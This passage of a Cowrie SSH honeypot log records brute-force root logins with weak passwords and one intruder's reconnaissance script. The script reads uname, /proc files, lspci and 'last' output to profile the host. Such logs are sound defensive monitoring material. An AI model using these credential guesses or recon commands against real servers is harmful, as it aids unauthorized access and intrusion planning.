-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:58:25.681323Z","src_ip":"185.93.89.7","session":"e2e58e11f5e8"}
{"eventid":"cowrie.login.success","username":"root","password":"index@2025","message":"login attempt [root/index@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:58:25.787906Z","src_ip":"185.93.89.7","session":"e2e58e11f5e8"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:58:25.815194Z","src_ip":"185.93.89.7","session":"e2e58e11f5e8"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48932,"dst_ip":"1.2.3.4","dst_port":22,"session":"48aa990a7b7b","protocol":"ssh","message":"New connection: 185.93.89.7:48932 (1.2.3.4:22) [session: 48aa990a7b7b]","sensor":"my-vps","timestamp":"2025-08-28T08:58:34.890948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:58:34.893160Z","src_ip":"185.93.89.7","session":"48aa990a7b7b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:58:34.912108Z","src_ip":"185.93.89.7","session":"48aa990a7b7b"}
{"eventid":"cowrie.login.success","username":"root","password":"Index@2025","message":"login attempt [root/Index@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:58:34.949536Z","src_ip":"185.93.89.7","session":"48aa990a7b7b"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:58:34.968337Z","src_ip":"185.93.89.7","session":"48aa990a7b7b"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":60206,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a716e68bbd","protocol":"ssh","message":"New connection: 51.79.164.132:60206 (1.2.3.4:22) [session: e7a716e68bbd]","sensor":"my-vps","timestamp":"2025-08-28T08:58:42.609522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:58:42.716834Z","src_ip":"51.79.164.132","session":"e7a716e68bbd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:58:43.100544Z","src_ip":"51.79.164.132","session":"e7a716e68bbd"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:58:44.601245Z","src_ip":"51.79.164.132","session":"e7a716e68bbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:58:45.219215Z","src_ip":"51.79.164.132","session":"e7a716e68bbd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:58:45.219905Z","src_ip":"51.79.164.132","session":"e7a716e68bbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:58:45.824437Z","src_ip":"51.79.164.132","session":"e7a716e68bbd"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:58:45.825740Z","src_ip":"51.79.164.132","session":"e7a716e68bbd"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38574,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aa5602b59ee","protocol":"ssh","message":"New connection: 185.93.89.7:38574 (1.2.3.4:22) [session: 1aa5602b59ee]","sensor":"my-vps","timestamp":"2025-08-28T08:58:56.531325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:58:56.532319Z","src_ip":"185.93.89.7","session":"1aa5602b59ee"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:58:56.550038Z","src_ip":"185.93.89.7","session":"1aa5602b59ee"}
{"eventid":"cowrie.login.failed","username":"index","password":"index","message":"login attempt [index/index] failed","sensor":"my-vps","timestamp":"2025-08-28T08:58:56.588388Z","src_ip":"185.93.89.7","session":"1aa5602b59ee"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:58:57.619098Z","src_ip":"185.93.89.7","session":"1aa5602b59ee"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":35624,"dst_ip":"1.2.3.4","dst_port":22,"session":"f25e3c0d6b57","protocol":"ssh","message":"New connection: 51.79.164.132:35624 (1.2.3.4:22) [session: f25e3c0d6b57]","sensor":"my-vps","timestamp":"2025-08-28T08:59:08.295531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:59:08.307415Z","src_ip":"51.79.164.132","session":"f25e3c0d6b57"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:59:08.987462Z","src_ip":"51.79.164.132","session":"f25e3c0d6b57"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:59:10.180494Z","src_ip":"51.79.164.132","session":"f25e3c0d6b57"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:59:11.757631Z","src_ip":"51.79.164.132","session":"f25e3c0d6b57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41772,"dst_ip":"1.2.3.4","dst_port":22,"session":"40e52c6ae5e6","protocol":"ssh","message":"New connection: 212.227.235.229:41772 (1.2.3.4:22) [session: 40e52c6ae5e6]","sensor":"my-vps","timestamp":"2025-08-28T08:59:12.283487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:59:13.928634Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:59:13.929350Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54826,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad22363c9efa","protocol":"ssh","message":"New connection: 185.93.89.7:54826 (1.2.3.4:22) [session: ad22363c9efa]","sensor":"my-vps","timestamp":"2025-08-28T08:59:20.703731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:59:20.704389Z","src_ip":"185.93.89.7","session":"ad22363c9efa"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:59:20.722858Z","src_ip":"185.93.89.7","session":"ad22363c9efa"}
{"eventid":"cowrie.login.failed","username":"index","password":"index!","message":"login attempt [index/index!] failed","sensor":"my-vps","timestamp":"2025-08-28T08:59:20.760043Z","src_ip":"185.93.89.7","session":"ad22363c9efa"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:59:21.782839Z","src_ip":"185.93.89.7","session":"ad22363c9efa"}
{"eventid":"cowrie.login.success","username":"root","password":"123abc","message":"login attempt [root/123abc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:59:22.330858Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:59:25.150254Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.150960Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.151673Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.152778Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.154066Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.154766Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.155854Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.157100Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.157567Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.158044Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.158649Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.159284Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:59:25.159837Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:59:27.136482Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
